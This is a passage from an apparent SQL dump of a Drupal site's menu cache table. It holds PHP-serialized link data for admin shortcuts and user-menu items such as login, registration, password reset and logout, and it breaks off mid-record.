content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:217;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:14:\"shortcut-set-1\";s:4:\"mlid\";s:3:\"217\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:12:\"Find content\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-49\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"217\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:308;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:14:\"shortcut-set-1\";s:4:\"mlid\";s:3:\"308\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:16:\"node/add/article\";s:11:\"router_path\";s:16:\"node/add/article\";s:10:\"link_title\";s:7:\"Article\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-48\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"308\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:41:\"a:2:{i:0;s:6:\"create\";i:1;s:7:\"article\";}\";s:13:\"page_callback\";s:8:\"node_add\";s:14:\"page_arguments\";s:24:\"a:1:{i:0;s:7:\"article\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"node/add/article\";s:5:\"title\";s:7:\"Article\";s:14:\"title_callback\";s:11:\"check_plain\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:89:\"Use articles for time-sensitive content like news, press releases or blog posts.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:0:{}}',0,1423658754,1),('links:user-menu:page:admin/config/people/accounts:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658967,1),('links:user-menu:page:admin/config/user-interface/shortcut/shortcut-set-1:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659127,1),('links:user-menu:page:admin/config:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658962,1),('links:user-menu:page:admin/content:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658880,1),('links:user-menu:page:admin/dashboard:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423775242,1),('links:user-menu:page:admin/modules:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658761,1),('links:user-menu:page:admin/people/permissions:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658773,1),('links:user-menu:page:admin/people:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658781,1),('links:user-menu:page:admin/reports/dblog:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659033,1),('links:user-menu:page:admin/reports/fields:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659086,1),('links:user-menu:page:admin/reports/hits:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659098,1),('links:user-menu:page:admin/reports/updates/update:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1426848142,1),('links:user-menu:page:admin/reports/visitors:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659117,1),('links:user-menu:page:admin/reports:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659027,1),('links:user-menu:page:admin/structure/block/manage/block/1/configure:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1424617194,1),('links:user-menu:page:admin/structure/contact:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658794,1),('links:user-menu:page:admin/structure/menu/manage/navigation/list:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659147,1),('links:user-menu:page:node/2/edit:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658929,1),('links:user-menu:page:node/2/track:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659004,1),('links:user-menu:page:node/2:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658921,1),('links:user-menu:page:node/5/edit:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423775026,1),('links:user-menu:page:node/5/track:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659018,1),('links:user-menu:page:node/5:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659015,1),('links:user-menu:page:node/6:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423775008,1),('links:user-menu:page:node/add/article:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658892,1),('links:user-menu:page:node/add:en:0:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1426806523,1),('links:user-menu:page:node/add:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658888,1),('links:user-menu:page:node:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658787,1),('links:user-menu:page:user/1/edit:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658823,1),('links:user-menu:page:user/1:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658805,1),('links:user-menu:page:user/6/edit:en:0:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1426848104,1),('links:user-menu:page:user/login:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:3:{i:0;i:0;i:2;s:1:\"2\";i:14;s:2:\"14\";}s:12:\"active_trail\";a:3:{i:0;i:0;i:2;s:1:\"2\";i:14;s:2:\"14\";}}',0,1423782393,1),('links:user-menu:page:user/login:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:3:{i:0;i:0;i:2;s:1:\"2\";i:14;s:2:\"14\";}s:12:\"active_trail\";a:3:{i:0;i:0;i:2;s:1:\"2\";i:14;s:2:\"14\";}}',0,1423782393,1),('links:user-menu:page:user/password:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:3:{i:0;i:0;i:2;s:1:\"2\";i:20;s:2:\"20\";}s:12:\"active_trail\";a:3:{i:0;i:0;i:2;s:1:\"2\";i:20;s:2:\"20\";}}',0,1423782247,1),('links:user-menu:page:user/password:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:3:{i:0;i:0;i:2;s:1:\"2\";i:20;s:2:\"20\";}s:12:\"active_trail\";a:3:{i:0;i:0;i:2;s:1:\"2\";i:20;s:2:\"20\";}}',0,1423782247,1),('links:user-menu:page:user/register:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:3:{i:0;i:0;i:2;s:1:\"2\";i:10;s:2:\"10\";}s:12:\"active_trail\";a:3:{i:0;i:0;i:2;s:1:\"2\";i:10;s:2:\"10\";}}',0,1423782306,1),('links:user-menu:page:user/register:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:3:{i:0;i:0;i:2;s:1:\"2\";i:10;s:2:\"10\";}s:12:\"active_trail\";a:3:{i:0;i:0;i:2;s:1:\"2\";i:10;s:2:\"10\";}}',0,1423782306,1),('links:user-menu:page:user:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:2:{i:0;i:0;i:2;s:1:\"2\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:2;s:1:\"2\";}}',0,1423782351,1),('links:user-menu:page:user:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:2:{i:0;i:0;i:2;s:1:\"2\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:2;s:1:\"2\";}}',0,1423782351,1),('links:user-menu:tree-data:en:0d6e202b4c81a3f17e6bb2b95e197e7030f41fcaaf86b1790031ad941f8b4975','a:2:{s:4:\"tree\";a:2:{i:2;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"user-menu\";s:4:\"mlid\";s:1:\"2\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:4:\"user\";s:11:\"router_path\";s:4:\"user\";s:10:\"link_title\";s:12:\"User account\";s:7:\"options\";s:22:\"a:1:{s:5:\"alter\";b:1;}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"2\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:1:\"1\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:9:\"user_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:4:\"user\";s:5:\"title\";s:12:\"User account\";s:14:\"title_callback\";s:15:\"user_menu_title\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:3:{i:10;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"user-menu\";s:4:\"mlid\";s:2:\"10\";s:4:\"plid\";s:1:\"2\";s:9:\"link_path\";s:13:\"user/register\";s:11:\"router_path\";s:13:\"user/register\";s:10:\"link_title\";s:18:\"Create new account\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"2\";s:2:\"p2\";s:2:\"10\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:20:\"user_register_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"user_register_form\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:4:\"user\";s:8:\"tab_root\";s:4:\"user\";s:5:\"title\";s:18:\"Create new account\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:14;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"user-menu\";s:4:\"mlid\";s:2:\"14\";s:4:\"plid\";s:1:\"2\";s:9:\"link_path\";s:10:\"user/login\";s:11:\"router_path\";s:10:\"user/login\";s:10:\"link_title\";s:6:\"Log in\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"2\";s:2:\"p2\";s:2:\"14\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:17:\"user_is_anonymous\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:9:\"user_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:4:\"user\";s:8:\"tab_root\";s:4:\"user\";s:5:\"title\";s:6:\"Log in\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:20;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"user-menu\";s:4:\"mlid\";s:2:\"20\";s:4:\"plid\";s:1:\"2\";s:9:\"link_path\";s:13:\"user/password\";s:11:\"router_path\";s:13:\"user/password\";s:10:\"link_title\";s:20:\"Request new password\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"2\";s:2:\"p2\";s:2:\"20\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:1:\"1\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:26:\"a:1:{i:0;s:9:\"user_pass\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:4:\"user\";s:8:\"tab_root\";s:4:\"user\";s:5:\"title\";s:20:\"Request new password\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:0:{}}}}i:15;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"user-menu\";s:4:\"mlid\";s:2:\"15\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:11:\"user/logout\";s:11:\"router_path\";s:11:\"user/logout\";s:10:\"link_title\";s:7:\"Log out\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"10\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:2:\"15\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:17:\"user_is_logged_in\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:11:\"user_logout\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:11:\"user/logout\";s:5:\"title\";s:7:\"Log out\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:0:{}}',0,1423782247,1),('links:user-menu:tree-data:en:1bf9431b7ce83b13ad912d974de7fb8167142fce7c1e9b09645034d4b77bbfe9','a:2:{s:4:\"tree\";a:2:{i:2;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"user-menu\";s:4:\"mlid\";s:1:\"2\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:4:\"user\";s:11:\"router_path\";s:4:\"user\";s:10:\"link_title\";s:12:\"User account\";s:7:\"options\";s:22:\"a:1:{s:5:\"alter\";b:1;}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"2\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:1:\"1\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:9:\"user_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:4:\"user\";s:5:\"title\";s:12:\"User account\";s:14:\"title_callback\";s:15:\"user_menu_title\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:0:{}}i:15;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"user-menu\";s:4:\"mlid\";s:2:\"15\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:11:\"user/logout\";s:11:\"router_path\";s:11:\"user/logout\";s:10:\"link_title\";s:7:\"Log out\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"10\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:2:\"15\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:17:\"user_is_logged_in\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:11:\"user_logout\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:11:\"user/logout\";s:5:\"title\";s:7:\"Log out\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:0:{}}',0,1423782306,1),('links:user-menu:tree-data:en:220b0d67aa9e79723f379074489a3b705b45e30c2d8501c016ffb0c6fa80b909','a:2:{s:4:\"tree\";a:2:{i:2;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"user-menu\";s:4:\"mlid\";s:1:\"2\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:4:\"user\";s:11:\"router_path\";s:4:\"user\";s:10:\"link_title\";s:12:\"User account\";s:7:\"options\";s:22:\"a:1:{s:5:\"alter\";b:1;}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"2\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:1:\"1\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:9:\"user_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:4:\"user\";s:5:\"title\";s:12:\"User 